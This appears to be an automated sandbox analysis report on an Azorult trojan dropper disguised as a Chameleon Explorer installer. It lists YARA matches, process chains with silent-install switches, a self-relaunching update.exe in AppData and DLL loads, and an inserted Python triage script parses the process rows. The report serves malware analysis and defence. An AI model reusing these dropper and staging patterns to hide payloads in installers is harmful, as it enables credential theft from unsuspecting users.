Source: 21.2.update.exe.29d6000.1.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 21.2.update.exe.29d6000.1.raw.unpack, type: UNPACKEDPE; Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000015.00000002.2485021748.00000000029D6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 00000015.00000002.2485021748.00000000029D6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 00000003.00000002.2181002868.0000000003226000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: ChameleonExplorer.exe, 00000004.00000000.1746141288.0000000000429000.00000020.00000001.01000000.0000000C.sdmp, ChameleonExplorer.exe, 0000000F.00000002.2961914587.0000000006940000.00000004.00001000.00020000.00000000.sdmp; Binary or memory string: .csproj
Source: classification engine; Classification label: mal100.spyw.evad.winEXE@29/46@3/4
Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp; Code function: 2_2_03566FD4 GetDiskFreeSpaceW,2_2_03566FD4
Source: C:\Users\user\AppData\Roaming\update.exe; Code function: 21_2_004162B0 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,GetCurrentProcessId,21_2_004162B0
Source: C:\Users\user\AppData\Roaming\update.exe; Code function: 21_2_0040B224 CoCreateInstance,21_2_0040B224
Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp; File created: C:\Program Files (x86)\Chameleon Explorer
Source: C:\Users\user\Desktop\ETVk1yP43q.exe; File created: C:\Users\user\AppData\Roaming\cexplorer.exe
Source: C:\Users\user\AppData\Roaming\update.exe; Mutant created: NULL
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe; Mutant created: \Sessions\1\BaseNamedObjects\ChameleonFolderMiddleClick
Source: C:\Users\user\AppData\Roaming\update.exe; Mutant created: \Sessions\1\BaseNamedObjects\AFA7A44E-69414907-A8AD8678-F9A7748B-95432BB7A
Source: C:\Users\user\Desktop\ETVk1yP43q.exe; File created: C:\Users\user\AppData\Local\Temp\aut5826.tmp
Source: Yara match; File source: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_backup, type: DROPPED
Source: Yara match; File source: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll, type: DROPPED
Source: Yara match; File source: C:\Program Files (x86)\Chameleon Explorer\is-32DE6.tmp, type: DROPPED
Source: C:\Users\user\Desktop\ETVk1yP43q.exe; Process created: C:\Users\user\AppData\Roaming\cexplorer.exe
Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp; Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
Source: unknown; Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
Source: ETVk1yP43q.exe; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Roaming\cexplorer.exe; Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp; Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe; Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe; Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe; Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | File read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
                    Source: ETVk1yP43q.exe | ReversingLabs: Detection: 68%
                    Source: ETVk1yP43q.exe | Virustotal: Detection: 59%
                    Source: unknown | Process created: C:\Users\user\Desktop\ETVk1yP43q.exe "C:\Users\user\Desktop\ETVk1yP43q.exe"
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Process created: C:\Users\user\AppData\Roaming\cexplorer.exe "C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-
                    Source: C:\Users\user\AppData\Roaming\cexplorer.exe | Process created: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp "C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp" /SL5="$4040E,6397385,121344,C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Process created: C:\Users\user\AppData\Roaming\update.exe "C:\Users\user\AppData\Roaming\update.exe"
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /trialregister
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /replaceexplorer
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /update
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /update
                    Source: unknown | Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe"
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe" 394276
                    Source: unknown | Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /startup
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe"
                    Source: unknown | Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe"
                    Source: unknown | Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /startup
                    Source: unknown | Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe"
                    Source: unknown | Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /startup
                    Source: C:\Users\user\AppData\Roaming\update.exe | Process created: C:\Users\user\AppData\Roaming\update.exe C:\Users\user\AppData\Roaming\update.exe"
                    Source: unknown | Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /startup
                    Source: unknown | Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe"
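The process-creation rows above are easier to triage as a parent/child tree than as a flat list. The script below is an added example written for this page, not Joe Sandbox tooling and not code from the analysed sample: it parses rows in the report's "Source: ... Process created: ..." form, rebuilds the tree, and tags the patterns worth looking at first in this report, namely executables launched from the user profile (%AppData%), Inno Setup's silent-install switches (/VERYSILENT, and the /SL5= handoff with which setup.exe launches its extracted setup.tmp), and a process that re-launches its own image (update.exe here). The sample input is a constructed subset of this report's own rows; the tag names and heuristics are this example's choices, not Joe Sandbox signatures.

```python
"""Rebuild the process tree from Joe Sandbox "Process created" rows and tag the
launch patterns an analyst would triage first. Added example for this page, not
Joe Sandbox tooling; tag names and heuristics are this script's own choices."""
import re

# Constructed sample input: a subset of the "Process created" rows from this
# report, pasted in the report's row format (with or without " | " separators).
SAMPLE_ROWS = r"""
Source: unknownProcess created: C:\Users\user\Desktop\ETVk1yP43q.exe "C:\Users\user\Desktop\ETVk1yP43q.exe"
Source: C:\Users\user\Desktop\ETVk1yP43q.exeProcess created: C:\Users\user\AppData\Roaming\cexplorer.exe "C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-
Source: C:\Users\user\AppData\Roaming\cexplorer.exeProcess created: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp "C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp" /SL5="$4040E,6397385,121344,C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-
Source: C:\Users\user\Desktop\ETVk1yP43q.exeProcess created: C:\Users\user\AppData\Roaming\update.exe "C:\Users\user\AppData\Roaming\update.exe"
Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /replaceexplorer
Source: unknownProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe"
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe" 394276
Source: C:\Users\user\AppData\Roaming\update.exeProcess created: C:\Users\user\AppData\Roaming\update.exe C:\Users\user\AppData\Roaming\update.exe"
"""

# One report row: the parent path is glued to "Process created:" in the HTML
# export; the image path is everything up to the first ".exe"/".tmp" followed
# by a space, and the rest of the row is the command line.
ROW_RE = re.compile(
    r"^Source: (?P<parent>.+?)(?: \| )?Process created: "
    r"(?P<image>.+?\.(?:exe|tmp)) (?P<cmdline>.*?)(?:\s*Jump to behavior)?\s*$"
)
INNO_SILENT = re.compile(r"/(?:VERY)?SILENT\b", re.I)  # Inno Setup no-UI switches
INNO_SL5 = re.compile(r"/SL5=", re.I)                  # Inno Setup setup.tmp handoff


def parse_rows(text):
    """Return unique (parent, image, cmdline) edges in report order."""
    seen, edges = set(), []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m is None:
            continue
        edge = (m["parent"], m["image"], m["cmdline"])
        if edge not in seen:
            seen.add(edge)
            edges.append(edge)
    return edges


def flag(parent, image, cmdline):
    """Heuristic tags for one process-creation edge (this example's own names)."""
    tags = []
    if re.search(r"\\AppData\\", image, re.I):
        tags.append("APPDATA_LAUNCH")        # executable staged in the user profile
    if INNO_SILENT.search(cmdline):
        tags.append("SILENT_INSTALLER")      # installer driven with no UI
    if INNO_SL5.search(cmdline):
        tags.append("INNO_SETUP_STAGE2")     # setup.tmp launched by its setup.exe
    if parent.lower() == image.lower():
        tags.append("SELF_SPAWN")            # process re-launching its own image
    return tags


def analyze(text):
    """Return (children-by-parent dict, list of (image, tags) for tagged edges)."""
    children, findings = {}, []
    for parent, image, cmdline in parse_rows(text):
        children.setdefault(parent, []).append(image)
        tags = flag(parent, image, cmdline)
        if tags:
            findings.append((image, tags))
    return children, findings


def render_tree(children, root="unknown", depth=0, seen=None):
    """Indented tree as a list of lines; 'seen' stops the self-spawn cycle."""
    if seen is None:
        seen = set()
    lines = []
    for child in children.get(root, []):
        lines.append("  " * depth + child.rsplit("\\", 1)[-1])
        if child not in seen:
            seen.add(child)
            lines.extend(render_tree(children, child, depth + 1, seen))
    return lines


if __name__ == "__main__":
    tree, found = analyze(SAMPLE_ROWS)
    print("\n".join(render_tree(tree)))
    for image, tags in found:
        print(f"{image}: {', '.join(tags)}")
```

Rows whose parent is "unknown" (the /startup relaunches of the Chameleon Explorer binaries) become roots of their own subtrees, which is itself useful: in this report they are the processes started by the autostart entries rather than by the dropper chain.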
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: wsock32.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: version.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: winmm.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: mpr.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: wininet.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: sxs.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: ntmarta.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: propsys.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: edputil.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: urlmon.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: iertutil.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: srvcli.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: netutils.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: wintypes.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: appresolver.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: bcp47langs.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: slc.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: sppc.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: pcacli.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: sfc_os.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: winhttpcom.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: winhttp.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: webio.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: mswsock.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: winnsi.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: dnsapi.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: rasadhlp.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: schannel.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: mskeyprotect.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: ntasn1.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: ncrypt.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: ncryptsslp.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: gpapi.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Section loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Roaming\cexplorer.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\cexplorer.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\cexplorer.exe | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\cexplorer.exe | Section loaded: netapi32.dll
                    Source: C:\Users\user\AppData\Roaming\cexplorer.exe | Section loaded: wkscli.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Section loaded: msimg32.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Section loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Section loaded: textinputframework.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Section loaded: coreuicomponents.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Section loaded: coremessaging.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Section loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Section loaded: wintypes.dll (3 occurrences)
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Section loaded: shfolder.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Section loaded: rstrtmgr.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Section loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Section loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Section loaded: textshaping.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Section loaded: msftedit.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Section loaded: windows.globalization.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Section loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Section loaded: bcp47mrm.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Section loaded: globinputhost.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Section loaded: dwmapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Section loaded: explorerframe.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Section loaded: sfc.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Section loaded: sfc_os.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Section loaded: propsys.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Section loaded: linkinfo.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Section loaded: ntshrui.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Section loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Section loaded: cscapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Section loaded: netapi32.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Section loaded: wkscli.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Section loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\update.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\update.exe | Section loaded: acgenral.dll
                    Source: C:\Users\user\AppData\Roaming\update.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\update.exe | Section loaded: winmm.dll
                    Source: C:\Users\user\AppData\Roaming\update.exe | Section loaded: samcli.dll
                    Source: C:\Users\user\AppData\Roaming\update.exe | Section loaded: msacm32.dll
                    Source: C:\Users\user\AppData\Roaming\update.exe | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\update.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\update.exe | Section loaded: dwmapi.dll
                    Source: C:\Users\user\AppData\Roaming\update.exe | Section loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\update.exe | Section loaded: mpr.dll
                    Source: C:\Users\user\AppData\Roaming\update.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\update.exe | Section loaded: winmmbase.dll (2 occurrences)
                    Source: C:\Users\user\AppData\Roaming\update.exe | Section loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\update.exe | Section loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\update.exe | Section loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\update.exe | Section loaded: aclayers.dll
                    Source: C:\Users\user\AppData\Roaming\update.exe | Section loaded: sfc.dll
                    Source: C:\Users\user\AppData\Roaming\update.exe | Section loaded: sfc_os.dll
                    Source: C:\Users\user\AppData\Roaming\update.exe | Section loaded: msvbvm60.dll
                    Source: C:\Users\user\AppData\Roaming\update.exe | Section loaded: vb6zz.dll
                    Source: C:\Users\user\AppData\Roaming\update.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\update.exe | Section loaded: sxs.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: version.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: mpr.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: shfolder.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: netapi32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: wininet.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: wsock32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: iphlpapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: wkscli.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: cscapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Section loaded: uxtheme.dll
